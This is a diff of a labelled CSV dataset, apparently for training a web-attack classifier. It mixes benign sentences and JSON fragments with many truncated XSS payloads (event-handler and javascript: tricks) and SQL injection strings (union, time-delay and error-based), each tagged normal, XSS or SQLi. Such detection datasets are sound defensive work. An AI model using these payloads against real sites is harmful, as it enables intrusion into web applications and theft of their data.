onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,4080 -<form><input formaction=javascript:alert(1) type=i,1,XSS,9178 -1,0,normal,26736 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10490 +So why would he suddenly want her to select the cl,0,normal,25538 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4581 +"&lt;SCRIPT/XSS SRC=\""http&#58;//ha&#46;ckers&#46;o",1,XSS,1091 +"-2033"" ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,22436 +"1' ) where 3262 = 3262 union all select null,null,",2,SQLi,12579 +"<div id=""136""><form action="""" method=""post"">",1,XSS,9125 +<spacer id=x tabindex=1 ondeactivate=alert(1)></sp,1,XSS,7953 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11104 +"1"" ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( ""a",2,SQLi,18061 +natural,0,normal,23150 +There it was mercilessly picked to pieces by a sel,0,normal,25329 +"<select onmouseleave=""alert(1)"">test</select>",1,XSS,6419 +1' in boolean mode ) or ( select * from ( select (,2,SQLi,16024 +"<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>",1,XSS,9090 +"select * from users where id = 1 or "".]"" or 1 = 1 ",2,SQLi,11442 +1 ) ) rlike ( select ( case when ( 7689 = 7689 ) t,2,SQLi,18713 +<th onpointerdown=alert(1)>XSS</th>,1,XSS,7099 +&lt;IMG SRC=javascript&#058;alert('XSS')&gt;,1,XSS,1100 +<frame id=x tabindex=1 ondeactivate=alert(1)></fra,1,XSS,5436 +"-7683"" ) where 9664 = 9664 union all select 9664,9",2,SQLi,13233 +"<a draggable=""true"" ondragstart=""alert(1)"">test</a",1,XSS,6453 +1'|| ( select 'ftey' where 1363 = 1363 and ( selec,2,SQLi,12331 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10788 +"-4739' ) ) union all select 6585,6585,6585,6585,65",2,SQLi,18102 +"1"" union all select null#",2,SQLi,20218 +Modify the security settings.,0,normal,22686 +"<summary onmouseenter=""alert(1)"">test</summary>",1,XSS,3351 +<span id=x tabindex=1 onactivate=alert(1)></span>,1,XSS,4082 +"<handler id=""y"">alert(127)</handler>",1,XSS,9180 +1,0,normal,26733 `'><script>\xE2\x80\x86javascript:alert(1)</script,1,XSS,588 -<x oncopy=alert(1)>copy this!,1,XSS,9347 -"1 ) as oblq where 2002 = 2002 or updatexml ( 1808,",2,SQLi,13270 -1 where 7224 = 7224 and sleep ( 5 ) #,2,SQLi,13538 -Select close.,0,normal,24600 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10965 -"{""id"":null,""firstName"":""Lay Sien"",""lastName"":""Ong""",0,normal,26971 -"-8266%' ) union all select 8626,8626,8626,8626,862",2,SQLi,13676 -"1"" ) and 8189 = ( select count ( * ) from sysibm.s",2,SQLi,19375 --9445 ) as dmur where 4371 = 4371 union all select,2,SQLi,21954 -Select move.,0,normal,24636 -"1"" where 4161 = 4161 and 8148 = like ( 'abcdefg',u",2,SQLi,16300 +<x ondblclick=alert(1)>double click this!,1,XSS,9349 +1'+ ( select 'qylf' where 6984 = 6984 and 2255 = 5,2,SQLi,13272 +1' rlike ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,13540 +Select locate.,0,normal,24597 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10967 +"{""id"":null,""name"":""post""}",0,normal,26968 +"-2787' union all select 3622,3622,3622,3622,3622,3",2,SQLi,13678 +"1' ) ) ) union all select null,null,null,null,null",2,SQLi,19377 +1 where 9083 = 9083 procedure analyse ( extractval,2,SQLi,21956 +Select register.,0,normal,24633 +1' and ( 3423 = 7789 ) *7789 and 'pdia' like 'pdia,2,SQLi,16302 "<! foo=""><script>javascript:alert(1)</script>"">",1,XSS,646 -select * from users where id = 1 * ( 1 ) union sel,2,SQLi,11750 -<button onBegin=javascript:alert(1)>,1,XSS,9588 --4583' ) as evbo where 6055 = 6055 union all selec,2,SQLi,16649 -or sleep ( __TIME__ ) #,2,SQLi,11740 --7184 ) as fshx where 3408 = 3408 or 5023 = ctxsys,2,SQLi,15037 +declare @s varchar ( 200 ) select @s = 0x73656c656,2,SQLi,11752 +<button onBounce=javascript:alert(1)>,1,XSS,9590 +1'|| ( select 'kptj' from dual where 5123 = 5123,2,SQLi,16651 +"select * from users where id = 1 or 1#"", = 1 or 1 ",2,SQLi,11742 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,15039 <script>Object.prototype.whiteList = {img: ['onerr,1,XSS,227 -schema,0,normal,23173 -Some variations of the system would let a rider se,0,normal,25531 -"<sup onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,3865 -"UNION SELECT @@VERSION,SLEEP(5),3",2,SQLi,10593 -Update the social media status.,0,normal,22659 -Pete Najarian was a buyer of the Financial Select ,0,normal,25780 -"{""id"":null,""name"":""Seismitoad""}",0,normal,27351 -"-9208%"" ) ) or 8571 = 8571--",2,SQLi,16155 -1 ) and 6510 = ( select count ( * ) from sysusers ,2,SQLi,20096 -<menu onpointerleave=alert(1)>XSS</menu>,1,XSS,8439 -"<img src=""livescript:document.vulnerable=true;"">",1,XSS,1530 -You can select the metering from spot to center we,0,normal,25077 +lock,0,normal,23175 +Specimens intended for the herbarium should be col,0,normal,25528 +"<rt onpaste=""alert(1)"" contenteditable>test</rt>",1,XSS,3867 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10595 +Delete the outdated files.,0,normal,22661 +"Pickup options: Select ""Check store availability"" ",0,normal,25777 +"{""id"":null,""firstName"":""Tony Quek"",""lastName"":""Que",0,normal,27350 +( select ( case when ( 6838 = 2866 ) then 6838 els,2,SQLi,16157 +1' ) as wtfo where 5666 = 5666 union all select nu,2,SQLi,20098 +"<noscript onmouseleave=""alert(1)"">test</noscript>",1,XSS,8441 +"<a href=""about:<script>document.vulnerable=true;</",1,XSS,1531 +You can select what portion of your document gets ,0,normal,25074 ‘)alert(1);//,1,XSS,924 -Select goods.,0,normal,24555 -Where's the best place to enjoy the beach?,0,normal,23714 -"1 ) union all select null,null,null,null,null,null",2,SQLi,20749 -1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105,2,SQLi,17054 -"-9014%' ) union all select 4211,4211,4211,4211,421",2,SQLi,19989 -"1"" ) where 7914 = 7914 rlike ( select * from ( sel",2,SQLi,21493 -or a=a,2,SQLi,10103 -"1"" ) where 4182 = 4182 or exp ( ~ ( select * from ",2,SQLi,21633 -"<tr oncontextmenu=""alert(1)"">test</tr>",1,XSS,7184 -"1%"" ) ) and 8594 = ( select 8594 from pg_sleep ( 5",2,SQLi,12151 -"Get 30 percent off select fashion items including,",0,normal,26149 -"<title oncontextmenu=""alert(1)"">test</title>",1,XSS,2592 -"<summary onkeyup=""alert(1)"" contenteditable>test</",1,XSS,5907 -Filter out irrelevant comments from the post.,0,normal,22894 -))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) ,2,SQLi,11206 -"<track onkeypress=""alert(1)"" contenteditable>test<",1,XSS,7134 -"<listing onmouseup=""alert(1)"">test</listing>",1,XSS,2308 -"1"" ) as hymr where 5497 = 5497 union all select nu",2,SQLi,20075 -"1"" where 1852 = 1852 union all select null,null,nu",2,SQLi,17072 -1'|| ( select 'jlka' where 5436 = 5436 or 4915 = (,2,SQLi,14204 -"`""'><img src=xxx:x onerror\x20=javascript:alert(1)",1,XSS,613 -Where's the campground?,0,normal,23552 +Select boutique.,0,normal,24552 +Can you help me decide where to travel?,0,normal,23716 +1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,20751 +"1"" or 8315 = ( select count ( * ) from sysibm.syst",2,SQLi,17056 +"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,19991 1' ) ) and 7533 = 7533 and ( ( 'ialm' = 'ialm,2,SQLi,21495 -"1%' union all select null,null,null,null#",2,SQLi,19585 -or SLEEP(5)=,2,SQLi,11169 -"<style>@keyframes x{}</style><listing style=""anima",1,XSS,6630 -<select onpointerdown=alert(1)>XSS</select>,1,XSS,4136 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1899 -select ( case when ( 1946 = 1302 ) then 1946 else ,2,SQLi,13938 +or isNULL(1/0) /*,2,SQLi,10105 +"1%"" ) ) ) order by 1#",2,SQLi,21635 +<dt onblur=alert(1) tabindex=1 id=x></dt><input au,1,XSS,7186 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,12153 +Get Stars at the grocery store from select Starbuc,0,normal,26146 +"<optgroup onmousedown=""alert(1)"">test</optgroup>",1,XSS,2593 +"<cite onpaste=""alert(1)"" contenteditable>test</cit",1,XSS,5909 +Modify your hairstyle for the special event.,0,normal,22896 +AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ',2,SQLi,11208 +"<tbody onbeforecut=""alert(1)"" contenteditable>test",1,XSS,7136 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2309 +"1 and elt ( 1210 = 1210,sleep ( 5 ) ) # macc",2,SQLi,20077 +"1"" ) ) as nlgn where 3834 = 3834 and 6510 = ( sele",2,SQLi,17074 +"1"" where 1719 = 1719 and 7533 = 7533--",2,SQLi,14206 +"`""'><img src=xxx:x onerror\x20=javascript:alert(1)",1,XSS,613 +Where's the cabin?,0,normal,23554 +"1"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""ckht"" = ",2,SQLi,21497 +1'+ ( select nxfp where 5006 = 5006,2,SQLi,19587 +1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY),2,SQLi,11171 +"<select onmouseup=""alert(1)"">test</select>",1,XSS,6632 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4138 +"d=""alert('');\"")"";",1,XSS,1900 +1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,13940 "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascri",1,XSS,283 "<IMG SRC="" &#14; javascript:alert('XSS');"">",1,XSS,259 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11117 -"{""id"":null,""firstName"":""Brandon"",""lastName"":""Cai"",",0,normal,26842 -"<strong onpaste=""alert(1)"" contenteditable>test</s",1,XSS,4944 -"-1152%' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ch",2,SQLi,19207 -"1', ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 1",2,SQLi,14722 -select * from users where id = 1<@.. union select ,2,SQLi,11532 --5268' ) where 5615 = 5615 or 2724 in ( ( char ( 1,2,SQLi,19910 -<small onpointermove=alert(1)>XSS</small>,1,XSS,6972 -"1' in boolean mode ) and elt ( 1210 = 1210,sleep (",2,SQLi,14890 -select sleep ( 5 ) and ( ( '%' = ',2,SQLi,13522 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5224 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2286 -"1"" ) rlike ( select * from ( select ( sleep ( 5 ) ",2,SQLi,22448 -<main onblur=alert(1) tabindex=1 id=x></main><inpu,1,XSS,8079 -1' ) ) as myws where 5274 = 5274,2,SQLi,21039 -"-3090"" or make_set ( 9354 = 9354,7185 ) and ""qowe""",2,SQLi,21385 -"<small onkeypress=""alert(1)"" contenteditable>test<",1,XSS,6711 -1,0,normal,26706 -ORDER BY SLEEP(5),2,SQLi,10404 -"1"" where 6281 = 6281 or 7552 = ( select count ( * ",2,SQLi,21801 +""" or 1=1--",2,SQLi,11119 +"{""id"":null,""name"":""blanket feet""}",0,normal,26839 +"<menu onmousemove=""alert(1)"">test</menu>",1,XSS,4946 +"1"" ) ) ) union all select null,null,null--",2,SQLi,19209 +"1 where 7196 = 7196 or 8466 = benchmark ( 5000000,",2,SQLi,14724 +select * from users where id = '1' + @ 1 union sel,2,SQLi,11534 +1 or 9643 = ( select count ( * ) from domain.domai,2,SQLi,19912 +<custom tags onpointermove=alert(1)>XSS</custom ta,1,XSS,6974 +select pg_sleep ( 5 ) and 'zfyy' = 'zfyy,2,SQLi,14892 +1 and 5934 = 7745,2,SQLi,13524 +"<samp onmouseenter=""alert(1)"">test</samp>",1,XSS,5226 +<cite onpointerenter=alert(1)>XSS</cite>,1,XSS,2287 +1' ) where 4786 = 4786 or ( select 2* ( if ( ( sel,2,SQLi,22450 +"<plaintext oncontextmenu=""alert(1)"">test</plaintex",1,XSS,8081 +"-5702' ) ) ) union all select 7806,7806,7806,7806,",2,SQLi,21041 +1' in boolean mode ) or char ( 117 ) ||char ( 111 ,2,SQLi,21387 +"<style>@keyframes slidein {}</style><p style=""anim",1,XSS,6713 +1,0,normal,26703 +ORDER BY SLEEP(5)#,2,SQLi,10406 +"1 ) ) union all select null,null--",2,SQLi,21803 "ABC<div style=""x:\xE2\x80\x87expression(javascript",1,XSS,476 -"1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch",2,SQLi,18940 -"select sleep ( 5 ) and ( ( ""wueo"" = ""wueo",2,SQLi,16392 -<em id=x tabindex=1 onfocus=alert(1)></em>,1,XSS,6412 -"<style>@keyframes slidein {}</style><bdi style=""an",1,XSS,2552 -"<mark onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,6853 -"<track onmouseover=""alert(1)"">test</track>",1,XSS,5547 -"1 or elt ( 6272 = 6272,sleep ( 5 ) ) -- ilfc",2,SQLi,13490 -1%' ) waitfor delay '0:0:5' and ( '%' = ',2,SQLi,18811 -primary,0,normal,23129 -Select your petition.,0,normal,24942 -"{""id"":null,""firstName"":""Han Jie"",""lastName"":""Kwong",0,normal,27114 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,18659 -<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1,1,XSS,9204 -"1%' ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d4",2,SQLi,17962 -Where's the spiritual healer?,0,normal,23649 -0.28,2,SQLi,10184 -1'|| ( select 'sliy' where 9494 = 9494,2,SQLi,20355 -1'|| ( select 'qgnz' where 6446 = 6446,2,SQLi,13566 -1' where 9024 = 9024 rlike ( select * from ( selec,2,SQLi,22264 -"1%"" union all select null#",2,SQLi,16281 -The president can select appointees who align in t,0,normal,25393 --9355' or 6872 = 6872 and 'mztk' = 'mztk,2,SQLi,21361 -<p id=x tabindex=1 onbeforedeactivate=alert(1)></p,1,XSS,7194 -1%' ) ) order by 1--,2,SQLi,20252 --5764 or 3038 = 3038,2,SQLi,18490 -"<svg onmousemove=""alert(1)"">test</svg>",1,XSS,6824 -Where's the best place to capture the sunset?,0,normal,23933 -select,0,normal,26600 +( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ),2,SQLi,18942 +"1"" ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 1",2,SQLi,16394 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6414 +"<caption oncontextmenu=""alert(1)"">test</caption>",1,XSS,2553 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6855 +"<style>@keyframes x{}</style><colgroup style=""anim",1,XSS,5549 +"1"" where 3227 = 3227 waitfor delay '0:0:5'--",2,SQLi,13492 +"1"" ) where 1392 = 1392 procedure analyse ( extract",2,SQLi,18813 +constraint,0,normal,23131 +Select your request.,0,normal,24939 +"{""id"":null,""name"":""mission hall stove""}",0,normal,27112 +1' ) ) as cmll where 7948 = 7948 and 4386 = utl_in,2,SQLi,18661 +"<image style='filter:url(""data:image/svg+xml,<svg ",1,XSS,9206 +"1%' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ",2,SQLi,17964 +Where's the tarot card reader?,0,normal,23651 +or '1'='1'--,2,SQLi,10186 +-3966' ) or 7338 = 8657,2,SQLi,20357 +"1%"" ) ) or exp ( ~ ( select * from ( select concat",2,SQLi,13568 +1' ) ) or 7552 = ( select count ( * ) from rdb$fie,2,SQLi,22266 +-7810 or 4493 = utl_inaddr.get_host_address ( chr ,2,SQLi,16283 +The pressure on a select group of senators will be,0,normal,25390 +"1 ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d",2,SQLi,21363 +"<style>@keyframes x{}</style><image style=""animati",1,XSS,7196 +"1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113",2,SQLi,20254 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,18492 +"<content onmouseenter=""alert(1)"">test</content>",1,XSS,6826 +I need to decide where to plant the garden.,0,normal,23935 +select,0,normal,26597 <style onreadystatechange=javascript:javascript:al,1,XSS,782 -"1' ) where 7640 = 7640 and make_set ( 8978 = 8594,",2,SQLi,14940 -1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,18134 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10984 -"<optgroup onbeforecopy=""alert(1)"" contenteditable>",1,XSS,6520 -<style>:target {color: red;}</style><meta id=x sty,1,XSS,5775 -"1"" ) ) as krro where 1050 = 1050 procedure analyse",2,SQLi,13172 -<script>alert(document.getElementsByTagName('html',1,XSS,9284 -\'-alert(1)//,1,XSS,9370 -"""Ask Dr. Ruth"" and ""Hesburgh"" premiere May 3 in se",0,normal,26463 -"1"" ) as dgzf where 4834 = 4834",2,SQLi,18709 -ORDER BY 30--,2,SQLi,10272 -<button id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,5056 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10801 -Complete lists of current British periodicals are ,0,normal,26271 -<INPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�,1,XSS,1728 -1 where 8578 = 8578 and 4770 = 4474--,2,SQLi,16995 -"-8279"" union all select 6598,6598,6598,6598,6598,6",2,SQLi,16010 -"<style>@keyframes x{}</style><noframes style=""anim",1,XSS,4667 -"1"" ) and 6414 = ( select count ( * ) from rdb$fiel",2,SQLi,21798 -"<style onmouseup=""alert(1)"">test</style>",1,XSS,8536 -<SCRIPT SRC=//.rocks/.j>,1,XSS,3751 --6597'+ ( select aewz where 4036 = 4036 union all ,2,SQLi,12925 -"-5520%"" union all select 5235,5235,5235,5235,5235,",2,SQLi,12723 -select * from users where id = '1' union select $*,2,SQLi,11408 +-1432 order by 1#,2,SQLi,14942 +"1%"" ) ) rlike sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,18136 +#ERROR!,2,SQLi,10986 +"<link onpaste=""alert(1)"" contenteditable>test</lin",1,XSS,6522 +"<sub oncopy=""alert(1)"" contenteditable>test</sub>",1,XSS,5777 +-7021' or 3038 = 3038,2,SQLi,13174 +"<script>alert(document.head.innerHTML.substr(146,2",1,XSS,9286 +alert&#40;1&#41,1,XSS,9372 +"""I do not accept the select committee and I will n",0,normal,26460 +"-8557 or 1 group by concat ( 0x7171706a71, ( selec",2,SQLi,18711 +ORDER BY 1#,2,SQLi,10274 +<strike id=x tabindex=1 ondeactivate=alert(1)></st,1,XSS,5058 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10803 +Container Store: Kitchen & Pantry sale: Save 25% o,0,normal,26268 +<IMG SRC=�javascript:alert(�XSS�)�,1,XSS,1729 +"-6809"" ) ) or 5903 = ( 'qqpjq'|| ( select case 590",2,SQLi,16997 +1'+ ( select 'phtz' where 3171 = 3171,2,SQLi,16012 +<svg><mark onload=alert(1)></mark>,1,XSS,4669 +"1%' ) ) union all select null,null,null,null,null,",2,SQLi,21800 +"<audio onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,8538 +"<abbr draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,3753 +"1"" ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,12927 +1' ) where 6244 = 6244 rlike ( select * from ( sel,2,SQLi,12725 +select * from users where id = '1' or $ 1 = 1 unio,2,SQLi,11410 <audio autoplay controls onseeked=alert(1)><source,1,XSS,98 -Where's your SQL expertise?,0,normal,23370 -"<dir onclick=""alert(1)"">test</dir>",1,XSS,3138 -1' ) as bfgl where 8959 = 8959 union all select nu,2,SQLi,13369 -"1"" ) where 3679 = 3679",2,SQLi,14358 -1' ) ) ( select ( case when ( 4587 = 4587 ) then r,2,SQLi,17922 -"1%' ) ) ) union all select null,null--",2,SQLi,13141 -1'+ ( select 'zjvx' where 4683 = 4683 and 6969 = (,2,SQLi,15178 -<nav onpointerover=alert(1)>XSS</nav>,1,XSS,3649 -""")%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10850 -Select merchandise.,0,normal,24556 -"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,17902 -"<;IMG SRC=javascript:alert(String.fromCharCode(88,",1,XSS,1634 -1' ) ) as txxn where 7884 = 7884 and 3715 in ( ( c,2,SQLi,21009 -"1"" ) as rnte where 6517 = 6517 and 9254 = ( select",2,SQLi,12465 -hi' or 1 = 1 --,2,SQLi,11862 -Modify the privacy settings for your account.,0,normal,22951 -"{""id"":null,""name"":""student having""}",0,normal,27262 -"-9583' ) ) union all select 6392,6392,6392,6392,63",2,SQLi,18475 -Where's my coffee?,0,normal,23482 -"<address onmousedown=""alert(1)"">test</address>",1,XSS,6172 -"<multicol oncopy=""alert(1)"" contenteditable>test</",1,XSS,7522 +Specify conditions where useful.,0,normal,23372 +"<thead onkeyup=""alert(1)"" contenteditable>test</th",1,XSS,3140 +"iif ( 3760 = 4785,1,1/0 )",2,SQLi,13371 +1'+ ( select inrv where 2178 = 2178 or 7417 = ( se,2,SQLi,14360 +"-9959"" ) where 7073 = 7073 union all select 7073,7",2,SQLi,17924 +-9145' ) or 5903 = ( 'qqpjq'|| ( select case 5903 ,2,SQLi,13143 +1'|| ( select 'txyy' where 6500 = 6500 procedure a,2,SQLi,15180 +"<IMG """"""><SCRIPT>alert("""")</SCRIPT>""\>",1,XSS,3651 +))%20waitfor%20delay%20'0:0:20'%20--,2,SQLi,10852 +Select product.,0,normal,24553 +"-3955 where 7276 = 7276 union all select 7276,7276",2,SQLi,17904 +<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;,1,XSS,1635 +"1 where 6383 = 6383 or elt ( 6272 = 6272,sleep ( 5",2,SQLi,21011 +1 ) as ghew where 6441 = 6441 union all select nul,2,SQLi,12467 +"select * from users where id = 1 or 1#"" ( union se",2,SQLi,11864 +Update your email signature with flair.,0,normal,22953 +"{""id"":null,""firstName"":""Chan"",""lastName"":""Sung"",""s",0,normal,27260 +1%' and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,18477 +Where's the treasure?,0,normal,23484 +<ol id=x tabindex=1 onactivate=alert(1)></ol>,1,XSS,6174 +<h1 onpointerleave=alert(1)>XSS</h1>,1,XSS,7524 `'><script>-javascript:alert(1)</script>,1,XSS,573 -or ''-',2,SQLi,9880 -"As any detailed statement of the critical system, ",0,normal,26352 -"1' ) where 4778 = 4778 and elt ( 3114 = 3114,sleep",2,SQLi,19447 +or ''&',2,SQLi,9882 +As Jennings and Wlezien put it: [I]n presidential ,0,normal,26349 +"1"" where 5062 = 5062",2,SQLi,19449 /><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:,1,XSS,598 -"1%"" and 8407 = ( select count ( * ) from generate_",2,SQLi,15353 -Create memories.,0,normal,23018 -She'll select the cake.,0,normal,24260 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7346 -<canvas onblur=alert(1) tabindex=1 id=x></canvas><,1,XSS,6305 -"{""id"":null,""name"":""Snover""}",0,normal,26864 -"-3433' ) where 8307 = 8307 union all select 8307,8",2,SQLi,16377 -Select your glide.,0,normal,25023 --5116 ) or ( 8287 = 4930 ) *4930,2,SQLi,22361 -"1"" ) as pxdq where 2236 = 2236 and 2006 = 2006",2,SQLi,18323 -"<style>@keyframes x{}</style><main style=""animatio",1,XSS,1754 -"1%"" ) ) rlike ( select ( case when ( 4207 = 1757 )",2,SQLi,20055 -Select your dream.,0,normal,24822 -1' ) ) ) and 6991 = 5579,2,SQLi,18746 --4644 or 5903 = ( 'qqpjq'|| ( select case 5903 whe,2,SQLi,20645 -"d=""alert('');\"")""",1,XSS,5433 -Update the website content.,0,normal,22670 -1' ) and 5556 = ( select count ( * ) from all_user,2,SQLi,13184 -Select search.,0,normal,24595 -"{""id"":null,""name"":""Lillipup""}",0,normal,26895 -"select * from users where id = 1 union select 1a,b",2,SQLi,11930 -Select napkin.,0,normal,24531 -Select the gear icon — this will prompt a window t,0,normal,25595 -"<div id=""53""><xml id=""xss"" src=""test.htc""></xml>",1,XSS,9136 -It premieres on Netflix and in select theaters in ,0,normal,25958 -select ( case when ( 6287 = 8341 ) then 6287 else ,2,SQLi,21976 -"<IMG SRC=x onafterprint=""alert(String.fromCharCode",1,XSS,1172 --4305 ) as ldrt where 2567 = 2567 union all select,2,SQLi,15563 -"<blockquote onkeyup=""alert(1)"" contenteditable>tes",1,XSS,7928 -select,0,normal,26621 -Go to the Start menu to Settings and select System,0,normal,26138 -"{""id"":null,""name"":""hang""}",0,normal,27014 -Select your message.,0,normal,24900 -1 where 3802 = 3802 and 2006 = 2006,2,SQLi,14532 -1'+ ( select 'vjoj' where 5348 = 5348,2,SQLi,15893 -""" Look for ""The New York Times"" and select ""enable",0,normal,26476 -1'|| ( select 'brde' where 7390 = 7390 and 4386 = ,2,SQLi,17259 -1 ) as vzyk where 5103 = 5103 and 8312 = dbms_pipe,2,SQLi,18682 -1,0,normal,26674 -<script onpointerup=alert(1)>XSS</script>,1,XSS,2644 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5348 -</script><svg onload=alert(1)>,1,XSS,9033 -1'+ ( select sijr where 7250 = 7250,2,SQLi,22060 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,16966 +"1"" ) ) as azak where 4911 = 4911",2,SQLi,15355 +Join fitness.,0,normal,23020 +Please select wisely.,0,normal,24262 +<style>@keyframes slidein {}</style><object style=,1,XSS,7348 +"<blockquote onbeforecopy=""alert(1)"" contenteditabl",1,XSS,6307 +"{""id"":null,""name"":""Bronzor""}",0,normal,26861 +"-4427' ) ) union all select 6357,6357,6357,6357,63",2,SQLi,16379 +Select your trip.,0,normal,25020 +1%' ) ) ( select ( case when ( 5451 = 5451 ) then ,2,SQLi,22363 +"-7678 ) ) ) union all select 2622,2622,2622,2622,2",2,SQLi,18325 +"<article draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,1755 +"1 ) procedure analyse ( extractvalue ( 5840,concat",2,SQLi,20057 +Select the dessert.,0,normal,24819 +1 where 1568 = 1568 or ( select * from ( select ( ,2,SQLi,18748 +"1"" and 4386 = utl_inaddr.get_host_address ( chr ( ",2,SQLi,20647 +"<output onkeyup=""alert(1)"" contenteditable>test</o",1,XSS,5435 +Merge the data tables.,0,normal,22672 +1'+ ( select trte where 9173 = 9173 and 2006 = 200,2,SQLi,13186 +Select load.,0,normal,24592 +"{""id"":null,""name"":""Samurott""}",0,normal,26892 +admin' ) or ( '1' = '1'#,2,SQLi,11932 +Select spoon.,0,normal,24528 +Select the language you want to use for closed cap,0,normal,25592 +"<div id=""61""><div style=""\63&#9\06f&#10\0006c&#12\",1,XSS,9138 +It remains $9 and is only available on select flig,0,normal,25955 +"1%"" ) ) and 3580 = ( select count ( * ) from domai",2,SQLi,21978 +"<IMG SRC=x onbeforeprint=""alert(String.fromCharCod",1,XSS,1173 +"1' and make_set ( 8403 = 8403,8899 ) and 'niux' = ",2,SQLi,15565 +"<style>@keyframes x{}</style><rp style=""animation-",1,XSS,7930 +select,0,normal,26618 +gone case select hello please,0,normal,26135 +"{""id"":null,""name"":""Nurse Shark""}",0,normal,27011 +Select your symbol.,0,normal,24897 +"1"" ) ) as ihfw where 3949 = 3949 and 8312 = dbms_p",2,SQLi,14534 +1' ) ) ) or sleep ( 5 ) and ( ( ( 'ecur' = 'ecur,2,SQLi,15895 +""" Sandeep demonstrated that these numbers can be u",0,normal,26473 +1' where 9242 = 9242,2,SQLi,17261 +"1' ) ) and 4241 = convert ( int, ( select char ( 1",2,SQLi,18684 +1,0,normal,26671 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2645 +<tt onpointerleave=alert(1)>XSS</tt>,1,XSS,5350 +"</stylesheet>//[""'`-->]]>]</div>",1,XSS,9035 +"1 ) ) ) union all select null,null,null--",2,SQLi,22062 +1' ) and 2577 = 7094,2,SQLi,16968 "<a href=""javascript:x='%27-alert(1)-%27';"">XSS</a>",1,XSS,205 -<small id=x tabindex=1 onfocus=alert(1)></small>,1,XSS,7897 -<svg/onload=alert`INJECTX`>,1,XSS,9834 -"<element onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,2015 -"1"" ) ) and 5556 = ( select count ( * ) from all_us",2,SQLi,17290 -1'+ ( select 'lcru' where 3215 = 3215,2,SQLi,17016 -"<noframes oncopy=""alert(1)"" contenteditable>test</",1,XSS,8462 -"1%' ) ) union all select null,null,null,null,null-",2,SQLi,19676 -"<rb draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,1975 +<button autofocus onfocusin=alert(1)>test</button>,1,XSS,7899 +}alert(/INJECTX/);{//,1,XSS,9836 +"<style>@keyframes x{}</style><main style=""animatio",1,XSS,2016 +"1"" ) as obbk where 6414 = 6414 and ( select 9067 f",2,SQLi,17292 +"1"" ) ) as eqeb where 6784 = 6784 and updatexml ( 3",2,SQLi,17018 +<form onpointerup=alert(1)>XSS</form>,1,XSS,8464 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,19678 +"<data draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,1976 "<a 